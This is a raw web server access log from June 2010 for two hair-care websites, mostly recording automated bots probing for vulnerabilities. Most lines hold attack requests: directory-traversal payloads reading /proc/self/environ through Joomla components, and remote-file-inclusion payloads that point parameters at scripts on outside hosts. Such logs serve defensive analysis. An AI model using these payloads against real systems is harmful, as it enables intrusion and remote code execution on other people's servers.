218.146.255.196 - - [14/Jun/2010:01:41:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:41:30 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [14/Jun/2010:01:41:58 -0700] "GET /logs/access_100503.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:41:58 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:41:58 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "growlonghairfast.com"
62.210.190.230 - - [14/Jun/2010:01:41:59 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
62.210.190.230 - - [14/Jun/2010:01:41:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
62.210.190.230 - - [14/Jun/2010:01:42:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:42:44 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:42:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:42:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:01:43:08 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:01:43:08 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [14/Jun/2010:01:43:08 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:43:25 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:43:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:43:26 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:45:41 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:45:51 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:46:21 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:46:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:46:22 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.58.183.16 - - [14/Jun/2010:01:46:29 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.183.16 - - [14/Jun/2010:01:46:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.58.183.16 - - [14/Jun/2010:01:46:29 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
187.45.193.159 - - [14/Jun/2010:01:46:50 -0700] "GET /logs/access.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:01:46:51 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.zcar.ir/.xml/.id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:01:46:51 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zcar.ir/.xml/.id? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:01:46:51 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.zcar.ir/.xml/.id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
62.149.207.129 - - [14/Jun/2010:01:48:17 -0700] "GET /logs/access_091012.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/xml.v? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [14/Jun/2010:01:48:17 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/xml.v? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [14/Jun/2010:01:48:17 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/xml.v? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:48:19 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:49:07 -0700] "GET /logs/access_100510.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:49:07 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:01:49:07 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.803" "growlonghairfast.com"
72.55.146.200 - - [14/Jun/2010:01:49:14 -0700] "GET /components/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [14/Jun/2010:01:49:14 -0700] "GET /logs//components/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [14/Jun/2010:01:49:15 -0700] "GET /logs/access.log//components/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:50:00 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:50:21 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:50:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:50:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:50:59 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:50:59 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:50:59 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:54:32 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:54:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:54:33 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
173.236.44.50 - - [14/Jun/2010:01:54:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:54:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:54:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [14/Jun/2010:01:54:48 -0700] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:54:57 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:54:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:01:54:58 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
207.58.183.16 - - [14/Jun/2010:01:55:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:55:10 -0700] "GET /logs/access_100503.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:55:11 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:55:11 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
173.236.44.50 - - [14/Jun/2010:01:55:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
207.58.183.16 - - [14/Jun/2010:01:55:32 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:01:55:45 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:01:55:45 -0700] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.183.116 - - [14/Jun/2010:01:55:45 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:55:51 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:55:51 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:55:51 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:57:25 -0700] "GET /logs/access.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:57:26 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.223 - - [14/Jun/2010:01:57:26 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "growlonghairfast.com"
64.34.165.224 - - [14/Jun/2010:01:58:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.34.165.224 - - [14/Jun/2010:01:58:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.34.165.224 - - [14/Jun/2010:01:58:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
122.201.90.71 - - [14/Jun/2010:01:58:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:01:58:22 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:58:22 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:01:58:23 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.34.165.224 - - [14/Jun/2010:01:58:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
122.201.90.71 - - [14/Jun/2010:01:59:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:02:01:47 -0700] "GET /logs/access_100510.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
193.231.187.33 - - [14/Jun/2010:02:03:17 -0700] "GET /components/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
193.231.187.33 - - [14/Jun/2010:02:03:17 -0700] "GET /logs//components/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
193.231.187.33 - - [14/Jun/2010:02:03:17 -0700] "GET /logs/access.log//components/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.180.131.78 - - [14/Jun/2010:02:03:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.freehairsecrets.com"
94.180.131.78 - - [14/Jun/2010:02:03:29 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.freehairsecrets.com"
78.46.70.228 - - [14/Jun/2010:02:04:48 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.46.70.228 - - [14/Jun/2010:02:04:48 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.46.70.228 - - [14/Jun/2010:02:04:48 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:02:04:59 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:02:04:59 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:02:05:00 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
119.235.237.20 - - [14/Jun/2010:02:05:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6110 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
218.146.255.196 - - [14/Jun/2010:02:06:20 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:02:06:21 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.146.255.196 - - [14/Jun/2010:02:06:21 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.175.66.250 - - [14/Jun/2010:02:08:20 -0700] "GET /conlib/local.php?cfg[path][contenido]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:02:08:20 -0700] "GET /logs//conlib/local.php?cfg[path][contenido]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.66.250 - - [14/Jun/2010:02:08:20 -0700] "GET /logs/access.log%20%20//conlib/local.php?cfg[path][contenido]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
